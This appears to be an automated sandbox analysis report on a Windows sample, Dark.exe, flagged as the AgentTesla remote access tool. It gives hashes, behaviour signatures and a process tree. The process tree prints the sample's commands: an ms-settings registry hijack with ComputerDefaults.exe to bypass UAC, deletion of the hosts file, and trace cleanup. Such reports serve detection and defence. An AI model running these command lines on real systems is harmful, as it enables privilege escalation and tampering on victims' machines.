Analysis
-
max time kernel
26s -
max time network
27s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
-
submitted
29/08/2024, 18:53
General
-
Target
Dark.exe
-
Size
2.2MB
-
MD5
b0c952e0a98835d76da62b3bd4cb7828
-
SHA1
eb7fb06d56bdf35a8d253debf56b4fad947d5505
-
SHA256
f722a7285a79f697284d7e376ea3122398c84be2a13eed2b2470ff03d752faad
-
SHA512
26b1654de14667ed5181e136cf70394f280c85758782e28fae86675e93466602f7fdd3d8c1efd0b4a70bb9ddc8be4e527e45797c433067935062c64465245d7c
-
SSDEEP
49152:/0X0AsmM6YOcXExsPq2QdGcrkEhsuC06aGHYxKGOoz:/tAsmy/y90V8oHlZ
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla payload 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 49 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dark.exe"C:\Users\Admin\AppData\Local\Temp\Dark.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Com.exe"C:\Users\Admin\AppData\Local\Temp\Com.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\24207.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\24207.vbs" /f4⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Modifies registry class
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\24207.vbs5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts6⤵
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\24207.vbs3⤵
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Modifies registry class
-
-
-
C:\Windows\System32\dllhost.exe"C:\Windows\System32\dllhost.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\DarkWare.exe"C:\Users\Admin\AppData\Local\Temp\DarkWare.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start cmd /C "color b && title Error && echo Signature checksum failed. Request was tampered with or session ended most likely. & echo: & echo Response: {"success":false,"message":"Session not found. Use latest code. You can only have app opened 1 at a time."} && timeout /t 5"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /C "color b && title Error && echo Signature checksum failed. Request was tampered with or session ended most likely. & echo: & echo Response: {"success":false,"message":"Session not found. Use latest code. You can only have app opened 1 at a time."} && timeout /t 5"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
Filesize
174B
MD5acbe9eb2299fd350d6d73686d1db85d6
SHA1405656d06203357cb7eafd40e22d7e55db2869f8
SHA256f0eb0a941e997c5f600dadc2610e06208112a5d78db3bca1bfad49adde496376
SHA512f3fad4ca824d7255cfa0ecb97951ad447d073c977196bc8f998b93d0668fff8ac1d49ef4c955723309427372a9d4999f5456d7ed51d5a4d465c38be91f13b5ed
-
Filesize
170B
MD57aa8f745963f2cfb01d987d5dbcebb96
SHA1c58169d13384f7bf3691350f59a49a4bf010c242
SHA256aeb37235e5bd7ef6e0b738be6a37a9ccc61a3bcde0cea3202121208669125918
SHA5128f2468af9261fc3126dbf71bbf9121d08c78434cd134dd1ddb5c5637370534f5f6fda9f75d30e91d401f7aeab879f69a1cd6f30df9fd7abe053bab5969599ed4
-
Filesize
125B
MD58b4ed5c47fdddbeba260ef11cfca88c6
SHA1868f11f8ed78ebe871f9da182d053f349834b017
SHA256170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA51287e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf
-
Filesize
230KB
MD5f08723bcb5c94651b8df18a3ad027460
SHA1e9f855543aab8f383a34d6a738889034daa6b5a3
SHA256b8ca9e14e7adaa62220329b33138336146a2b3188215fcbd38365efc2f756460
SHA5123f647c85345e08d533d15a3fab7394da3caff2b4fdbaaa83946321312f3f17d5cba018309d4b2206f083f9fd90f568c27399932c2ae5ae79200a05d6dd0da589
-
Filesize
2.0MB
MD520f94ee7f660352e0c8a14810a183350
SHA11a39916394380b3ba2fba53249fa82ffc88e2876
SHA2567f14473c3d2bc352e829f2c15754cf8a41f43bbadd9413b5765c65913660a922
SHA512c1c4933d81234507cad12a524426e69096f28f710e61ad1a0cdb011567c6ca9b67bf24e2f74d87d1df8d7462de08add33bdbb0d4628efd4d55f6fe0bac96125e
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
584KB
-
Filesize
5.6MB
-
Filesize
7.7MB
-
Filesize
240KB
-
Filesize
2.1MB
-
Filesize
40KB
-
Filesize
2.0MB
-
Filesize
72KB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
2.2MB
-
Filesize
8KB